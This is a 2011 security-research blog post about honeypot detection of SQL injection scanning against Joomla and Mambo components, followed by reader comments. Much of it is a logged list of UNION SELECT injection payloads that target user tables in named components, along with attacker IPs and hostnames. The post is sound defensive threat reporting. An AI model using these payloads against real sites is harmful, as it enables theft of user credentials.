Search



SpiderLabs Services
Resources

Research Stats

Categories

Security Advisories

Trustwave Press Releases

« Manipulating Windows File Protection and Indicators of Compromise | Main | [Honeypot Alert] Awstats Command Injection Scanning Detected »

09 December 2011

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components.

GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1
GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_gameq&task=page&category_id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_myalbum&album=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C2%2C3%2C4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_geoboerse&page=view&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_maianmusic§ion=category&Itemid=70&category=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_marketplace&page=show_category&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index2.php?option=com_joomradio&page=show_radio&id=4 and 1=0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_ownbiblio&view=catalogue&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_joomradio&page=show_video&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_quran&action=viewayat&surano=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%2F%2A%2A%2Flimit%2F%2A%2A%2F0%2C20-- HTTP/1.1
GET /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_contactinfo&catid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_joomladate&task=viewProfile&user=9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?search=NoGe&option=com_esearch&searchId=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_ownbiblio&view=catalogue&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simpleboard&func=view&catid=-999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F2%2C2%2C3%2C0x33633273366962%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_datsogallery&func=detail&id=%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_datsogallery&func=detail&id=%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_referenzen&Itemid=7&detail=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_jmovies&Itemid=29&task=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_filiale&idFiliale=-5%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_gallery&Itemid=0&func=detail&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=faq&task=viewallfaq&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_idoblog&task=userblog&userid=42 and 1=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_flippingbook&Itemid=28&book_id=null%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=faq&task=viewallfaq&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790 AND 1=2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simpleshop&Itemid=41&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_aist&view=vacancylist&contact_id=-3 and 1=2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_kbase&view=article&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_rapidrecipe&user_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_mygallery&func=viewcategory&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_rapidrecipe&page=viewcategory&Itemid=26&category_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C3%2C0%2C0%2C0%2C4%2C4%2C4%2C0%2C0%2C0%2C5%2C5%2C5%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_gallery&Itemid=0&func=detail&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_product&Itemid=12&task=viewlist&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2C9%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_maianmusic§ion=category&Itemid=70&category=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simpleboard&func=view&catid=-999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F2%2C2%2C3%2C0x33633273366962%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_mdigg&act=story_lists&task=view&category=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_jabode&task=sign&sign=taurus&id=-2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1
GET /index.php?option=com_fq&Itemid=S@BUN&listid=9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
GET /index.php?option=com_mad4joomla&jid=-2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_simple_review&category=4 and 1=2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
GET /index.php?option=com_referenzen&Itemid=7&detail=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1

According to OSVDB - here are the known vulnerabilities titles they were scanning for:

SimpleFAQ Component for Joomla! index.php aid Parameter SQL Injection
Musepoes Component for Mambo / Joomla! index.php aid Parameter SQL Injection
Marketplace Component for Joomla! (com_marketplace) index.php catid Parameter SQL Injection
Chess Club Component for Joomla! index.php user_id Parameter SQL Injection
Gallery Component for Mambo / Joomla! index.php id Parameter SQL Injection
Quran Component for Mambo / Joomla! index.php surano Parameter SQL Injection
Joomlapixel Jooget! Component for Joomla! index.php id Parameter SQL Injection
Garys Cookbook Component for Joomla! index.php id Parameter SQL Injection
Simpleboard Component for Mambo / Joomla! index.php catid Parameter SQL Injection
RSGallery Component for Mambo / Joomla! index.php catid Parameter SQL Injection
Filiale Component for Joomla! index.php idFiliale Parameter SQL Injection
Simple Shop Galore Component for Joomla! index.php catid Parameter SQL Injection
GameQ Component for Joomla! index.php category_id Parameter SQL Injection
Mad4Joomla Mailforms Component for Joomla! index.php jid Parameter SQL Injection
OwnBiblio Component for Joomla! index.php catid Parameter SQL Injection
KBase Component for Joomla! index.php id Parameter SQL Injection
Contact Information Module Component for Joomla! index.php catid Parameter SQL Injection
mDigg Component for Joomla! index.php category Parameter SQL Injection
Fantasy Tournament Component for Joomla index.php Multiple Parameter SQL Injection
Joomla! FAQ Component catid Parameter SQL Injection
Joomla! com_geoboerse Component catid Parameter SQL Injection
Joomla! com_magazine Component pageid Parameter SQL Injection
Joomla! com_referenzen Component detail Parameter SQL Injection
Joomla! com_asortyment Component Multiple Parameter SQL Injection
Joomla! com_joomlavvz Component id Parameter SQL Injection
Simple Shop Galore Component for Joomla! index.php section Parameter SQL Injection
Simple Review Component for Mambo / Joomla! index.php category Parameter SQL Injection
Jabode Horoscope Extension for Joomla! index.php id Parameter SQL Injection
Marketplace Component for Joomla! index.php catid Parameter XSS
TNR ESearch Component for Joomla! components/com_esearch/esearch.php searchId Parameter SQL Injection

It appears that the attack payloads are taken directly from the OSVDB "Manual Testing Notes" section with presents proof of concept attack payloads to test exploitability.

The scanning came from 30 different IP address -

173.212.195.142
173.212.195.174
173.212.197.42
173.212.197.54
173.212.209.216
173.212.209.220
173.212.209.228
173.212.209.244
173.212.209.246
173.212.227.14
173.212.227.38
173.212.227.48
173.212.227.54
173.212.235.12
173.212.235.34
173.212.235.38
173.212.235.44
173.212.254.12
173.212.254.44
173.212.254.50
64.191.99.110
64.191.99.120
64.191.99.68
64.191.99.74
66.197.227.134
66.197.227.170
66.197.227.184
96.9.173.14
96.9.173.48
96.9.173.62

While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string: Mozilla/5.2 (Windows; U; Windows NT 5.2; en-EN) Gecko/20080919 Firefox/3.5.6. This leads us to believe that the attack was carried about by the same source client.  Further supporting this theory is the fact that most of these IP addresses are hosted on the "hostnoc.net" domain.

173-212-195-142.static.hostnoc.net.
173-212-195-174.static.hostnoc.net.
173-212-197-42.static.hostnoc.net.
mail.wizzsolutions.com.
server.site2r.info.
james-server.info.
173-212-209-228.static.hostnoc.net.
air2.jetthost.net.
173-212-209-246.static.hostnoc.net.
server1.thermalhost.net.
fusionswift.com.
173-212-227-48.static.hostnoc.net.
173-212-227-54.static.hostnoc.net.
173-212-235-12.static.hostnoc.net.
srvs.us.
search-placement.info.
173-212-235-44.static.hostnoc.net.
173-212-254-12.static.hostnoc.net.
platon.yapitasi.com.
173-212-254-50.static.hostnoc.net.
64-191-99-110.static.hostnoc.net.
64-191-99-120.static.hostnoc.net.
64-191-99-68.static.hostnoc.net.
64-191-99-74.static.hostnoc.net.
svx36r.colheitainfeliz.co.cc.
66-197-227-170.static.hostnoc.net.
66-197-227-184.static.hostnoc.net.
96-9-173-14.static.hostnoc.net.
96-9-173-48.static.hostnoc.net.
96-9-173-62.static.hostnoc.net.

Posted by on 09 December 2011 at 09:21 in [Honeypot Alert], Application Security, Security Research |

Comments

@Lamar - ha, I am working on a blog post right now on the same type of traffic. We are seeing it too.

Posted by: Ryan Barnett | 19 December 2011 at 12:32

Ryan,

You are correct. This issue is apparently related to the awstats issue we discussed last week, along with some additional information regarding code injection against phpAlbum:

http://foxtrot7security.blogspot.com/2011/12/attacks-against-awstats-also-includes.html

Posted by: Lamar Spells | 19 December 2011 at 12:25

Good day, Ryan:

Sadly, the attacks are still ongoing from burst.net.

Thank you.

Posted by: Dynamicnet | 16 December 2011 at 07:31

Dear,

we get same hackers attacks from Hostnoc.net from the 6th of december until today in the night ca. 4h CET. We have send them at the 7th a abuse complaint and we got 24h later a message, that all attackers traffic will now stopped, but was not stopped!

About this, and the much of traffic from much differented IPs, we have make at the 9th of december a complaint to the IC3.GOV (Internet Crime Complaint Center) why the IP is in the range of an operating center in USA and I hope next time more and more persons will doe this!

We have register on one of 4 attacked servers minimum 43 differented IPs from out of 13 differented IP/24 - segments from HOSTNOC! I cant understand, that one company has the chance to give one client 43 differented IPs out of 13 differented IP/24-Segments! Why when we need a IP, than we can get only 4 maximum for one server!

Thanks Detlef
1awww ISP

Posted by: 1awww | 11 December 2011 at 10:36

Seeing the same type of traffic coming from these IPs. If you are running Cisco IDS, it will be identified as the cisco_ids-5930 (Generic SQL Injection).. Pretty hard to miss, especially with the Trustwave Console and the "Critical Asset Targeted" event which is displayed in the Console..

Posted by: Mabartle | 09 December 2011 at 10:53

Good day, Ryan:

We've been sending Burst.net abuse reports for close to one week now concerning a huge spike of attacks coming from IP addresses that are 100% under their control.

When there was no remediation after several days, I started http://www.webhostingtalk.com/showthread.php?t=1105887 in hopes that Burst.net would escalate the handling of this abuse.

Thank you, Ryan, for shedding further light on the abuse issue.

Thank you.

Posted by: Dynamicnet | 09 December 2011 at 09:50

Verify your Comment

Previewing your Comment

Posted by:  | 

This is only a preview. Your comment has not yet been posted.

Working...
Your comment could not be posted. Error type:
Your comment has been posted. Post another comment

The letters and numbers you entered did not match the image. Please try again.

As a final step before posting your comment, enter the letters and numbers you see in the image below. This prevents automated programs from posting comments.

Having trouble reading this image? View an alternate.

Working...

Post a comment